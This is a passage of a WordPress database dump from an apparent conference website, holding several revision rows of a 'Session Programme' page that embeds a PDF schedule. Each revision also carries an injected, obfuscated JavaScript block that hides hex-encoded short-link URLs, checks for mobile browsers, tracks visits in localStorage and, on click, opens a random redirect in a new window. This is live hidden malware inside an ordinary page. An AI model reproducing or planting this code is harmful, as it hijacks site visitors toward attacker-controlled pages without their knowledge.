Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Programme','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:43:25','2023-08-23 08:43:25','',5122,'https://gsw2023.com/?p=5392',0,'revision','',0),
(5393,1,'2023-08-23 08:46:50','2023-08-23 08:46:50','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:46:50','2023-08-23 08:46:50','',5122,'https://gsw2023.com/?p=5393',0,'revision','',0),
(5394,1,'2023-08-23 08:48:08','2023-08-23 08:48:08','','GSW2023-Program-2023-08-23','','inherit','open','closed','','gsw2023-program-2023-08-23-4','','','2023-08-23 08:48:08','2023-08-23 08:48:08','',5122,'https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23-4.pdf',0,'attachment','application/pdf',0),
(5395,1,'2023-08-23 08:48:39','2023-08-23 08:48:39','[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23-4.pdf\" title=\"GSW2023-Program-2023-08-23\"]\r\n<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Session Program','','inherit','closed','closed','','5122-revision-v1','','','2023-08-23 08:48:39','2023-08-23 08:48:39','',5122,'https://gsw2023.com/?p=5395',0,'revision','',0),
(5396,1,'2023-08-23 08:49:57','2023-08-23 08:49:57','<p style=\"text-align: center;\">[pdf-embedder url=\"https://gsw2023.com/wp-content/uploads/2023/08/GSW2023-Program-2023-08-23.pdf\"]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 